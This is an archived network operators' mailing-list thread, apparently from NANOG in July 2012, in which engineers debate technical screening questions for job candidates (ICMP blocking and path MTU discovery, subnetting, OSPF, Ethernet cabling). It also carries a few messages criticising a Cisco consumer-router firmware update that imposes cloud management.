>>>> part of the TCP protocol (not IP in general, TCP specifically)
>>>> malfunctions as a result?
>> Isn't MTU discovery on IP and not TCP?
> If you want to overthink the question, the failure in the TCP protocol
> is that it doesn't adjust the MSS to match the path MTU. It continues
> to rely on the incorrect path MTU estimate, sending too-large packets
> which will never arrive. This happens because TCP doesn't receive a
> notification that the path MTU estimate has changed from the default
> because the lower layer PMTUD algorithm never receives the expected
> ICMP packet.
>
> This is, incidentally, a detail I'd love for one of the candidates
> to offer in response to that question. Bonus points if you discuss MSS
> clamping and RFC 4821.
>
> The less precise answer, path MTU discovery breaks, is just fine.
>
> Regards,
> Bill Herrin
>
>
>
>
> --
> William D. Herrin ................ herrin at dirtside.com bill at herrin.us
> 3005 Crane Dr. ......................
> Web:
> Falls Church, VA 22042-3004
>
>

From eyeronic.design at gmail.com Thu Jul 5 18:53:18 2012
From: eyeronic.design at gmail.com (Mike Hale)
Date: Thu, 5 Jul 2012 16:53:18 -0700
Subject: job screening question
In-Reply-To:
References:
Message-ID:

Something tells me you're suddenly going to find yourself with an
influx of correct answers...

On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote:
> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote:
>>>> You implement a firewall on which you block all ICMP packets. What
>>>> part of the TCP protocol (not IP in general, TCP specifically)
>>>> malfunctions as a result?
>>
>> Isn't MTU discovery on IP and not TCP?
>
> If you want to overthink the question, the failure in the TCP protocol
> is that it doesn't adjust the MSS to match the path MTU. It continues
> to rely on the incorrect path MTU estimate, sending too-large packets
> which will never arrive. This happens because TCP doesn't receive a
> notification that the path MTU estimate has changed from the default
> because the lower layer PMTUD algorithm never receives the expected
> ICMP packet.
>
> This is, incidentally, a detail I'd love for one of the candidates
> to offer in response to that question. Bonus points if you discuss MSS
> clamping and RFC 4821.
>
> The less precise answer, path MTU discovery breaks, is just fine.
>
> Regards,
> Bill Herrin
>
>
>
>
> --
> William D. Herrin ................ herrin at dirtside.com bill at herrin.us
> 3005 Crane Dr. ......................
> Web:
> Falls Church, VA 22042-3004
>

--
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

From surfer at mauigateway.com Thu Jul 5 19:01:39 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Thu, 5 Jul 2012 17:01:39 -0700
Subject: job screening question
Message-ID: <20120705170139.EEEE1B26@resin13.mta.everyone.net>

--- jason at thebaughers.com wrote:
From: Jason Baugher

Geez, I'd be happy to find someone with a good attitude, a solid work
ethic, and the desire and aptitude to learn. :)
---------------------------------------


Yeah, that. But how do you get those folks through the HR process to you, so you can decipher their skill/work ethic level? What can the HR person ask to find out if someone has these qualities? OSPF LSA type questions will not help.

I definitely would rather work with a person willing to learn the nuances of the particular network, rather than someone that can spit out canned answers.

scott

From jlewis at lewis.org Thu Jul 5 19:14:59 2012
From: jlewis at lewis.org (Jon Lewis)
Date: Thu, 5 Jul 2012 20:14:59 -0400 (EDT)
Subject: job screening question
In-Reply-To:
References:
Message-ID:

He'll have to come up with another weedout question, like "what's a /27?" I'm constantly amazed/disappointed when we interview candidates for a senior Linux admin job and they just don't know modern networking at all.

Even better question, with multiple right answers, "how many IPs are in a /32?" You could probably have some fun with most applicants[1] when they answer 1, and then you ask "would you like to expand on that answer?"

The small (sub /24) subnets are dealt with so frequently in an ISP/hosting provider environment, that IMO, anyone claiming to have experience in such an environment should just flat out know how many IPs and the subnet masks for /32 - /24 in IPv4, or be sufficiently comfortable with subnetting that they can figure these things out quickly enough to avoid awkward pauses during the interview if asked about them.
1) At least the few who get it right.

On Thu, 5 Jul 2012, Mike Hale wrote:

> Something tells me you're suddenly going to find yourself with an
> influx of correct answers...
>
> On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote:
>> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote:
>>>>> You implement a firewall on which you block all ICMP packets. What
>>>>> part of the TCP protocol (not IP in general, TCP specifically)
>>>>> malfunctions as a result?
>>>
>>> Isn't MTU discovery on IP and not TCP?
>>
>> If you want to overthink the question, the failure in the TCP protocol
>> is that it doesn't adjust the MSS to match the path MTU. It continues
>> to rely on the incorrect path MTU estimate, sending too-large packets
>> which will never arrive. This happens because TCP doesn't receive a
>> notification that the path MTU estimate has changed from the default
>> because the lower layer PMTUD algorithm never receives the expected
>> ICMP packet.
>>
>> This is, incidentally, a detail I'd love for one of the candidates
>> to offer in response to that question. Bonus points if you discuss MSS
>> clamping and RFC 4821.
>>
>> The less precise answer, path MTU discovery breaks, is just fine.
>>
>> Regards,
>> Bill Herrin
>>
>>
>>
>>
>> --
>> William D. Herrin ................ herrin at dirtside.com bill at herrin.us
>> 3005 Crane Dr. ...................... Web:
>> Falls Church, VA 22042-3004
>>
>
>
>
> --
> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>

----------------------------------------------------------------------
 Jon Lewis, MCP :)           |  I route
 Senior Network Engineer     |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From owen at delong.com Thu Jul 5 19:22:49 2012
From: owen at delong.com (Owen DeLong)
Date: Thu, 5 Jul 2012 17:22:49 -0700
Subject: job screening question
In-Reply-To:
References:
Message-ID: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>

I would use questions such as the following:

1. How many end-sites can be numbered from a single /32.
   (Correct answers: IPv4 - 1, IPv6 - 65,536)

2. In what circumstance might you need to use IPSEC to secure OSPF instead of MD5 authentication?

3. How many /32s can be created from a single /24? (Hint, this answer is the same for IPv4 and IPv6)

4. What is the purpose of an IP address such as ::ffff:192.0.2.123?

5. What is the reason for the 100m distance limit within an ethernet collision domain?

The essay questions can wait for the interview if they get past these basics.

Owen

On Jul 5, 2012, at 5:14 PM, Jon Lewis wrote:

> He'll have to come up with another weedout question, like "what's a /27?" I'm constantly amazed/disappointed when we interview candidates for a senior Linux admin job and they just don't know modern networking at all.
>
> Even better question, with multiple right answers, "how many IPs are in a /32?" You could probably have some fun with most applicants[1] when they answer 1, and then you ask "would you like to expand on that answer?"
>
> The small (sub /24) subnets are dealt with so frequently in an ISP/hosting provider environment, that IMO, anyone claiming to have experience in such an environment should just flat out know how many IPs and the subnet masks for /32 - /24 in IPv4, or be sufficiently comfortable with subnetting that they can figure these things out quickly enough to avoid awkward pauses during the interview if asked about them.
>
> 1) At least the few who get it right.
>
> On Thu, 5 Jul 2012, Mike Hale wrote:
>
>> Something tells me you're suddenly going to find yourself with an
>> influx of correct answers...
>>
>> On Thu, Jul 5, 2012 at 3:18 PM, William Herrin wrote:
>>> On Thu, Jul 5, 2012 at 5:05 PM, Derek Andrew wrote:
>>>>>> You implement a firewall on which you block all ICMP packets. What
>>>>>> part of the TCP protocol (not IP in general, TCP specifically)
>>>>>> malfunctions as a result?
>>>>
>>>> Isn't MTU discovery on IP and not TCP?
>>>
>>> If you want to overthink the question, the failure in the TCP protocol
>>> is that it doesn't adjust the MSS to match the path MTU. It continues
>>> to rely on the incorrect path MTU estimate, sending too-large packets
>>> which will never arrive. This happens because TCP doesn't receive a
>>> notification that the path MTU estimate has changed from the default
>>> because the lower layer PMTUD algorithm never receives the expected
>>> ICMP packet.
>>>
>>> This is, incidentally, a detail I'd love for one of the candidates
>>> to offer in response to that question. Bonus points if you discuss MSS
>>> clamping and RFC 4821.
>>>
>>> The less precise answer, path MTU discovery breaks, is just fine.
>>>
>>> Regards,
>>> Bill Herrin
>>>
>>>
>>>
>>>
>>> --
>>> William D. Herrin ................ herrin at dirtside.com bill at herrin.us
>>> 3005 Crane Dr. ...................... Web:
>>> Falls Church, VA 22042-3004
>>>
>>
>>
>>
>> --
>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>>
>
> ----------------------------------------------------------------------
>  Jon Lewis, MCP :)           |  I route
>  Senior Network Engineer     |  therefore you are
>  Atlantic Net                |
> _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From bill at herrin.us Thu Jul 5 19:32:46 2012
From: bill at herrin.us (William Herrin)
Date: Thu, 5 Jul 2012 20:32:46 -0400
Subject: job screening question
In-Reply-To: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
Message-ID:

On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote:
> I would use questions such as the following:
>
> 1. How many end-sites can be numbered from a single /32.
>    (Correct answers: IPv4 - 1, IPv6 - 65,536)

IPv6 - 16,777,216 to 268,435,456 :p

> 5. What is the reason for the 100m distance limit within an ethernet collision domain?

What's an ethernet collision domain? Seriously, when was the last time
you dealt with a half duplex ethernet?
Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From george.herbert at gmail.com Thu Jul 5 19:47:16 2012
From: george.herbert at gmail.com (George Herbert)
Date: Thu, 5 Jul 2012 17:47:16 -0700
Subject: job screening question
In-Reply-To:
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
Message-ID: <961A10EE-5DB7-444E-BFD9-28D7AE2DF3AA@gmail.com>

On Jul 5, 2012, at 5:32 PM, William Herrin wrote:

>
>> 5. What is the reason for the 100m distance limit within an ethernet collision domain?
>
> What's an ethernet collision domain? Seriously, when was the last time
> you dealt with a half duplex ethernet?
>

Last time I built a cluster; admin and some redundant ingress/egress methods do better with hubs than switches.

Also last time I had to build a cheap redundant firewall.

This is a corner case, but if you just know ether as a point to point it will eventually bite you. Having some spanning tree clue is much more relevant now, though.

George William Herbert
Sent from my iPhone

From surfer at mauigateway.com Thu Jul 5 19:50:52 2012
From: surfer at mauigateway.com (Scott Weeks)
Date: Thu, 5 Jul 2012 17:50:52 -0700
Subject: job screening question
Message-ID: <20120705175052.EEEE1F88@resin13.mta.everyone.net>

--- bill at herrin.us wrote:
From: William Herrin

> 5. What is the reason for the 100m distance limit within an ethernet collision domain?

What's an ethernet collision domain? Seriously, when was the last time
you dealt with a half duplex ethernet?
-----------------------------------------


Now if someone answered it that way, I'd definitely be interested while the HR person would just hang up...
scott

From randy_94108 at yahoo.com Thu Jul 5 20:06:04 2012
From: randy_94108 at yahoo.com (Randy)
Date: Thu, 5 Jul 2012 18:06:04 -0700 (PDT)
Subject: job screening question
In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net>
Message-ID: <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com>

apologies for top posting.

Everyone, including me, has addressed "what/how/by who" wrt the question at hand.

Bill- Another poster has already asked this question- Can you post a sample of the "answers" you have received, which prompted you to ask this question to begin with?

./Randy

--- On Thu, 7/5/12, Scott Weeks wrote:
> From: Scott Weeks
> Subject: Re: job screening question
> To: nanog at nanog.org
> Date: Thursday, July 5, 2012, 5:50 PM
>
>
> --- bill at herrin.us wrote:
> From: William Herrin
>
>> 5. What is the reason for the 100m distance limit within an ethernet collision domain?
>
> What's an ethernet collision domain? Seriously, when was the last time
> you dealt with a half duplex ethernet?
> -----------------------------------------
>
>
> Now if someone answered it that way, I'd definitely be
> interested while the HR person would just hang up...
>
> scott
>
>

From bill at herrin.us Thu Jul 5 20:09:55 2012
From: bill at herrin.us (William Herrin)
Date: Thu, 5 Jul 2012 21:09:55 -0400
Subject: job screening question
In-Reply-To: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com>
References: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com>
Message-ID:

On Thu, Jul 5, 2012 at 7:01 PM, Randy wrote:
> --- On Thu, 7/5/12, William Herrin wrote:
>> The less precise answer, path MTU discovery breaks, is just
>> fine.
>
> Precisely! And if I understand correctly, a non-technical person
> within HR is expected to hear this answer and relay it to you?
> That is more than a long shot. Unless of course they have
> photographic memories, are great typists or perhaps do
> "short hand".
So I get a garbled answer about disk fragmentation. I can't tell the difference between an answer garbled in transit and an answer that was flat wrong to begin with?

The point of the question is to help me decide which people I want to spend half an hour on the phone with and which ones get a polite thank-you-not-it from HR while I do the parts of my job that don't involve interviewing folks. If there's any doubt about whether they belong in the not-it category, they proceed to the phone interview.

Regards,
Bill Herrin

P.S. Yes, I got an answer about "degrading DNS port unreachables and MTU disk fragmenting as well." I asked HR to set up a phone interview. If that wasn't an HR garble, I *really* want to hear the explanation. :D

--
William D. Herrin ................ herrin at dirtside.com bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From valdis.kletnieks at vt.edu Thu Jul 5 20:17:32 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Thu, 05 Jul 2012 21:17:32 -0400
Subject: job screening question
In-Reply-To: Your message of "Thu, 05 Jul 2012 15:05:01 -0600."
References:
Message-ID: <34255.1341537452@turing-police.cc.vt.edu>

On Thu, 05 Jul 2012 15:05:01 -0600, Derek Andrew said:
> Isn't MTU discovery on IP and not TCP?

AIX actually supported PMTUD for UDP. Not sure if it still does. Yes, it was bizarro even for AIX. No, I'm not aware of any actual UDP applications that were able to do anything useful with this info. ;)
From jlewis at lewis.org Thu Jul 5 20:28:16 2012
From: jlewis at lewis.org (Jon Lewis)
Date: Thu, 5 Jul 2012 21:28:16 -0400 (EDT)
Subject: job screening question
In-Reply-To:
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
Message-ID:

On Thu, 5 Jul 2012, William Herrin wrote:

> On Thu, Jul 5, 2012 at 8:22 PM, Owen DeLong wrote:
>> I would use questions such as the following:
>>
>> 1. How many end-sites can be numbered from a single /32.
>>    (Correct answers: IPv4 - 1, IPv6 - 65,536)
>
> IPv6 - 16,777,216 to 268,435,456 :p
>
>
>> 5. What is the reason for the 100m distance limit within an ethernet collision domain?
>
> What's an ethernet collision domain? Seriously, when was the last time
> you dealt with a half duplex ethernet?

You've never (much less recently) seen a customer misconfigure their end of an ethernet handoff such that you end up with duplex mismatch? Granted, in that case, distance is irrelevant...but it is half half-duplex ethernet :)

----------------------------------------------------------------------
 Jon Lewis, MCP :)           |  I route
 Senior Network Engineer     |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________

From bill at herrin.us Thu Jul 5 20:33:53 2012
From: bill at herrin.us (William Herrin)
Date: Thu, 5 Jul 2012 21:33:53 -0400
Subject: job screening question
In-Reply-To: <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com>
References: <20120705175052.EEEE1F88@resin13.mta.everyone.net> <1341536764.83378.YahooMailClassic@web181117.mail.ne1.yahoo.com>
Message-ID:

> Can you post a sample of the "answers" you have received, which
> prompted you to ask this question to begin with?

I've been asking the question in phone interviews for months. I couldn't quote them properly but the answers were... discouraging. No one beyond ping and traceroute.
I asked HR last week to start asking the question as a pre-screen and forward me the answer. The first one responded "This would block all IP traffic." I figured it was time for a sanity check to make sure the question was reasonable.

Regards,
Bill

--
William D. Herrin ................ herrin at dirtside.com bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From bicknell at ufp.org Thu Jul 5 20:36:34 2012
From: bicknell at ufp.org (Leo Bicknell)
Date: Thu, 5 Jul 2012 18:36:34 -0700
Subject: job screening question
In-Reply-To:
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
Message-ID: <20120706013634.GA25986@ussenterprise.ufp.org>

In a message written on Thu, Jul 05, 2012 at 08:32:46PM -0400, William Herrin wrote:
> What's an ethernet collision domain? Seriously, when was the last time
> you dealt with a half duplex ethernet?

5 segments
4 repeaters
3 segments with transmitting hosts
2 transit segments
1 collision domain

If any employer thought that was useful knowledge for a job today I would probably run away, as fast as possible!

--
Leo Bicknell - bicknell at ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/

From bill at herrin.us Thu Jul 5 20:43:29 2012
From: bill at herrin.us (William Herrin)
Date: Thu, 5 Jul 2012 21:43:29 -0400
Subject: job screening question
In-Reply-To:
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com>
Message-ID:

On Thu, Jul 5, 2012 at 9:28 PM, Jon Lewis wrote:
> You've never (much less recently) seen a customer misconfigure their end of
> an ethernet handoff such that you end up with duplex mismatch? Granted, in
> that case, distance is irrelevant...but it is half half-duplex ethernet :)

If I was asking an ethernet question, I'd rather ask:

1. How do you make a crossover ethernet cable to connect two switches? (cross the green and orange pairs)

2. What happens if you plug that cable into a pair of gigabit ethernet switches? (mdix malfunctions, ports negotiate to 100 full, on some poorly implemented switches the mix of straight and crossed wires eventually damage the ports so they can no longer do gige)

Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From kmedcalf at dessus.com Thu Jul 5 20:43:53 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Thu, 05 Jul 2012 19:43:53 -0600
Subject: Cisco Update
In-Reply-To: <977C2C1F-0994-4297-B5B0-54E3D6E796C3@seanharlow.info>
Message-ID: <792c02a74c580143bb94ae888421af3a@mail.dessus.com>

I see.

Replace "local access" control with "let anyone on the internet reconfigure the thing". Whoever's idea it was should be p*ssed on, keelhauled, drawn and quartered, then burned at the stake.

---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

> -----Original Message-----
> From: Sean Harlow [mailto:sean at seanharlow.info]
> Sent: Thursday, 05 July, 2012 10:26
> To: Hank Nussbacher
> Cc: nanog at nanog.org
> Subject: Re: Cisco Update
>
> On Jul 5, 2012, at 12:08, Hank Nussbacher wrote:
>
>> For those of us who have not kept up with every latest feature that Cisco
>> rolls out across all its platforms, can someone explain this new service? Is
>> it like Windows update, where Cisco will auto-update your router s/w and
>> thereby brick it? If I don't register my router with Cisco, what do I lose?
>> I can't update it manually?
>
> Long story short, the affected routers (newer "Cisco" [former Linksys]
> consumer products) received an automatic firmware update which basically
> disables the device's onboard web UI and forces you to use Cisco's "cloud"
> management system.
> The biggest issue with this is that apparently it has
> some function, possibly for web filtering, which sends network traffic
> information of some sort to Cisco's service. They also state that regardless
> of the auto-update setting a device may be updated anyways if Cisco says so.
>
> One article I found says it affects the E2700, E3500, and E4500 models.
>

From scott at doc.net.au Thu Jul 5 20:45:26 2012
From: scott at doc.net.au (Scott Howard)
Date: Thu, 5 Jul 2012 18:45:26 -0700
Subject: job screening question
In-Reply-To: <4FF5CC01.6010504@davidcoulson.net>
References: <4FF5CC01.6010504@davidcoulson.net>
Message-ID:

On Thu, Jul 5, 2012 at 10:16 AM, David Coulson wrote:

> What if they said "it would cause the generation of port-unreachable ICMP
> packets to cease, and applications may hang until they timeout"? Not the
> answer you're looking for, but not wrong either.
>

Umm, yeah, it is wrong. The question was TCP. TCP doesn't send ICMP Port-Unreach, it sends RST packets.

Scott

From diogo.montagner at gmail.com Thu Jul 5 20:47:07 2012
From: diogo.montagner at gmail.com (Diogo Montagner)
Date: Fri, 6 Jul 2012 09:47:07 +0800
Subject: job screening question
In-Reply-To: <20120705164836.EEEE1921@resin13.mta.everyone.net>
References: <20120705164836.EEEE1921@resin13.mta.everyone.net>
Message-ID:

Maybe I was not too clear with my answer.

The main idea was to execute a first level of filtering to separate the candidates that put information in their CV that does not match with the basic requirements for the position. For example:

- requirement: strong knowledge in routing protocols (list of protocols, including OSPF)

If the person doesn't know the answer about the LSA type, it is already out and you don't need to allocate a technical interviewer for that.

On the other hand, if the person answers the question correctly, it does not mean he or she is a good candidate. But at least you can allocate a tech interviewer to check in detail the person's knowledge.
And will the person guess all the types of basic question he or she can get in the first level of interview? Well, if the homework was done properly, maybe. But then at least you have someone with attitude (preparation for the interview). I agree with who answered that attitude is one important point.

If in your organization you can allocate a tech interviewer from the first interview, that IMO will help a lot and it is the best scenario for recruiting. But even though you get a strong technical engineer, you still need to assess his soft skills.

Regards

On 7/6/12, Scott Weeks wrote:
>
> --- diogo.montagner at gmail.com wrote:
> From: Diogo Montagner
>
> For screening questions (for 1st level filtering), IMO, the questions
> have to be straight to the point, for example:
>
> 1) What is the LSA number for an external route in OSPF?
>
> This can have two answers: 5 or 7. So, I will accept if the candidate
> answers 5, 7 or 5 and 7. Later on (the next level of the interview), a
> technical interviewer will check if the candidate understands the
> differences of LSA 5 and 7.
> -----------------------------------------------------------
>
>
> How often do you use this in everyday netgeeking? Asking these
> types of questions will assure that you get someone with a vendor
> i-drank-the-kool-aid cert because they memorized the answers, but
> maybe not the best candidate for the position. However, with some
> of today's managers kool-aid certs are looked on as better than an
> engineering degree. Go figure... :-(
>
> scott
>
>

--
Sent from my mobile device

./diogo -montagner
JNCIE-M 0x41A

From kmedcalf at dessus.com Thu Jul 5 20:46:09 2012
From: kmedcalf at dessus.com (Keith Medcalf)
Date: Thu, 05 Jul 2012 19:46:09 -0600
Subject: Cisco Update
In-Reply-To:
Message-ID:

Significantly faster and with far fewer bugs than the Cisco/Linksys as well.
---
()  ascii ribbon campaign against html e-mail
/\  www.asciiribbon.org

> -----Original Message-----
> From: David Hubbard [mailto:dhubbard at dino.hostasaurus.com]
> Sent: Thursday, 05 July, 2012 10:56
> To: nanog at nanog.org
> Subject: RE: Cisco Update
>
> Technical users could always just flash DD-WRT onto the device and replace
> the Linksys/Cisco firmware; then you have a much more robust system without
> any big brother stuff.

From jgreco at ns.sol.net Thu Jul 5 20:01:36 2012
From: jgreco at ns.sol.net (Joe Greco)
Date: Thu, 5 Jul 2012 20:01:36 -0500 (CDT)
Subject: Cisco Update
In-Reply-To: <792c02a74c580143bb94ae888421af3a@mail.dessus.com>
Message-ID: <201207060101.q6611bIB086234@aurora.sol.net>

> I see.
>
> Replace "local access" control with "let anyone on the internet reconfigure
> the thing". Whoever's idea it was should be p*ssed on, keelhauled, drawn
> and quartered, then burned at the stake.

It'll get real interesting when Cisco's cloud database is breached and some weakness in the password encryption is discovered.

... JG
--
Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
"We call it the 'one bite at the apple' rule. Give me one chance [and] then I
won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN)
With 24 million small businesses in the US alone, that's way too many apples.
From randy_94108 at yahoo.com Thu Jul 5 21:10:32 2012
From: randy_94108 at yahoo.com (Randy)
Date: Thu, 5 Jul 2012 19:10:32 -0700 (PDT)
Subject: job screening question
In-Reply-To:
Message-ID: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com>

--- On Thu, 7/5/12, William Herrin wrote:
> From: William Herrin
> Subject: Re: job screening question
> To: "Jon Lewis"
> Cc: "nanog at nanog.org"
> Date: Thursday, July 5, 2012, 6:43 PM
> On Thu, Jul 5, 2012 at 9:28 PM, Jon Lewis wrote:
>> You've never (much less recently) seen a customer misconfigure their end of
>> an ethernet handoff such that you end up with duplex mismatch? Granted, in
>> that case, distance is irrelevant...but it is half half-duplex ethernet :)
>
> If I was asking an ethernet question, I'd rather ask:
>
> 1. How do you make a crossover ethernet cable to connect two switches?
> (cross the green and orange pairs)
>
> 2. What happens if you plug that cable into a pair of gigabit ethernet
> switches? (mdix malfunctions, ports negotiate to 100 full, on some
> poorly implemented switches the mix of straight and crossed wires
> eventually damage the ports so they can no longer do gige)
>
> Regards,
> Bill Herrin

Or for that matter, in the absence of auto-MDI/MDIX:

1) when is a straight-through cable *required*?
2) when is a cross-over cable *required*?

How about another HR-Question: what do 0.0.0.0/1 and 128.0.0.0/1 as static-routes accomplish?

./Randy

From dedelman at iname.com Thu Jul 5 21:20:58 2012
From: dedelman at iname.com (David Edelman)
Date: Fri, 06 Jul 2012 02:20:58 +0000
Subject: job screening question
In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net>
Message-ID:

On 7/6/12 12:50 AM, "Scott Weeks" wrote:

>
>
> --- bill at herrin.us wrote:
> From: William Herrin
>
>> 5. What is the reason for the 100m distance limit within an
>> ethernet collision domain?
>
> What's an ethernet collision domain?
> Seriously, when was the last time
> you dealt with a half duplex ethernet?
> -----------------------------------------
>
>
> Now if someone answered it that way, I'd definitely be
> interested while the HR person would just hang up...
>
> scott
>

Anyone who responds that way has at least a notion of collision detection and propagation delay and might actually have a bit of experience in the field, not bad things. Is the next question about exponential back off or regeneration of preamble?

--Dave

From valdis.kletnieks at vt.edu Thu Jul 5 21:26:52 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Thu, 05 Jul 2012 22:26:52 -0400
Subject: job screening question
In-Reply-To: Your message of "Thu, 05 Jul 2012 18:36:34 -0700." <20120706013634.GA25986@ussenterprise.ufp.org>
References: <11573520-8467-404F-AA09-1AA6D2AB4E22@delong.com> <20120706013634.GA25986@ussenterprise.ufp.org>
Message-ID: <3092.1341541612@turing-police.cc.vt.edu>

On Thu, 05 Jul 2012 18:36:34 -0700, Leo Bicknell said:
> If any employer thought that was useful knowledge for a job today I
> would probably run away, as fast as possible!

Only way I'd take that job is with both budget and authority to clean up the mess. However, those kind of things are usually politically messy enough that you don't want to be the FTE who does it - that's what consultants are for. :)

From owen at delong.com Thu Jul 5 21:25:52 2012
From: owen at delong.com (Owen DeLong)
Date: Thu, 5 Jul 2012 19:25:52 -0700
Subject: job screening question
In-Reply-To: <20120705175052.EEEE1F88@resin13.mta.everyone.net>
References: <20120705175052.EEEE1F88@resin13.mta.everyone.net>
Message-ID: <87A5E4C5-2AC5-461B-8A50-98DDCF57A8BA@delong.com>

On Jul 5, 2012, at 5:50 PM, Scott Weeks wrote:

>
>
> --- bill at herrin.us wrote:
> From: William Herrin
>
>> 5. What is the reason for the 100m distance limit within an ethernet collision domain?
>
> What's an ethernet collision domain? Seriously, when was the last time
> you dealt with a half duplex ethernet?
> -----------------------------------------
>
>
> Now if someone answered it that way, I'd definitely be
> interested while the HR person would just hang up...
>
> scott

+1 -- That would be a perfectly valid answer and one of the list of answers I would actually give to HR.

Owen

From owen at delong.com Thu Jul 5 21:30:04 2012
From: owen at delong.com (Owen DeLong)
Date: Thu, 5 Jul 2012 19:30:04 -0700
Subject: job screening question
In-Reply-To: <34255.1341537452@turing-police.cc.vt.edu>
References: <34255.1341537452@turing-police.cc.vt.edu>
Message-ID:

On Jul 5, 2012, at 6:17 PM, valdis.kletnieks at vt.edu wrote:

> On Thu, 05 Jul 2012 15:05:01 -0600, Derek Andrew said:
>> Isn't MTU discovery on IP and not TCP?
>
> AIX actually supported PMTUD for UDP. Not sure if it still does. Yes, it was
> bizarro even for AIX. No, I'm not aware of any actual UDP applications that
> were able to do anything useful with this info. ;)
>

Think IPSEC NAT Traversal over UDP and/or Teredo. (Yes, Teredo is ugly and should be banned from any legitimate network, but...)

Owen

From owen at delong.com Thu Jul 5 21:29:14 2012
From: owen at delong.com (Owen DeLong)
Date: Thu, 5 Jul 2012 19:29:14 -0700
Subject: job screening question
In-Reply-To:
References: <1341529309.22035.YahooMailClassic@web181114.mail.ne1.yahoo.com>
Message-ID: <38A4FCED-2242-40E9-BF64-304B987CA5C5@delong.com>

On Jul 5, 2012, at 6:09 PM, William Herrin wrote:

> On Thu, Jul 5, 2012 at 7:01 PM, Randy wrote:
>> --- On Thu, 7/5/12, William Herrin wrote:
>>> The less precise answer, path MTU discovery breaks, is just
>>> fine.
>>
>> Precisely! And if I understand correctly, a non-technical person
>> within HR is expected to hear this answer and relay it to you?
>> That is more than a long shot.
Unless of course they have >> photographic memories, are great typists or perhaps do >> "short hand". > > So I get a garbled answer about disk fragmentation. I can't tell the > difference between an answer garbled in transit and an answer that was > flat wrong to begin with? > I suspect this was a candidate answer about "Packet Fragmentation" (e.g. the answer you were looking for) and that your HR might have translated "packet" into "disk" because that's the only place they've heard of fragmentation. > The point of the question is to help me decide which people I want to > spend half an hour on the phone with and which ones get a polite > thank-you-not-it from HR while I do the parts of my job that don't > involve interviewing folks. If there's any doubt about whether they > belong in the not-it category, they proceed to the phone interview. Makes sense, but, the example garbled answer you provided seems entirely legitimate to me. > > Regards, > Bill Herrin > > P.S. Yes, I got an answer about "degrading DNS port unreachables and > MTU disk fragmenting as well." I asked HR to set up a phone interview. > If that wasn't an HR garble, I *really* want to hear the explanation. > :D > Yep... Pretty sure that everything you listed here so far would be an HR garble of a legitimately correct (within your parameters) answer. 
Owen From dedelman at iname.com Thu Jul 5 21:33:49 2012 From: dedelman at iname.com (David Edelman) Date: Fri, 06 Jul 2012 02:33:49 +0000 Subject: job screening question In-Reply-To: <1341540632.64263.YahooMailClassic@web181104.mail.ne1.yahoo.com> Message-ID: On 7/6/12 2:10 AM, "Randy" wrote: >--- On Thu, 7/5/12, William Herrin wrote: > >> From: William Herrin >> Subject: Re: job screening question >> To: "Jon Lewis" >> Cc: "nanog at nanog.org" >> Date: Thursday, July 5, 2012, 6:43 PM >> On Thu, Jul 5, 2012 at 9:28 PM, Jon >> Lewis >> wrote: >> > You've never (much less recently) seen a customer >> misconfigure their end of >> > an ethernet handoff such that you end up with duplex >> mismatch? Granted, in >> > that case, distance is irrelevant...but it is half >> half-duplex ethernet :) >> >> If I was asking an ethernet question, I'd rather ask: >> >> 1. How do you make a crossover ethernet cable to connect two >> switches? >> (cross the green and orange pairs) >> >> 2. What happens if you plug that cable into a pair of >> gigabit ethernet >> switches? (mdix malfunctions, ports negotiate to 100 full, >> on some >> poorly implemented switches the mix of straight and crossed >> wires >> eventually damage the ports so they can no longer do gige) >> >> Regards, >> Bill Herrin > > >Or for that matter, in the absence of auto-MDI/MDIX: > >1) when is a straight-through cable *required*? >2) when is a cross-over cable *required*? > >How about another HR-Question: > >what do 0.0.0.0/1 and 128.0.0.0.0/1 as static-routes accomplish? > >./Randy > My favorite screening question at the moment is: What does a NULL-Route for 169.254.0.0/16 not fix on a Cisco router? Answer - Compliance with RFC 3927 because it doesn't fix the problem of a link-local source address. Answers that also mention proxy-ARP result in immediate interviews. 
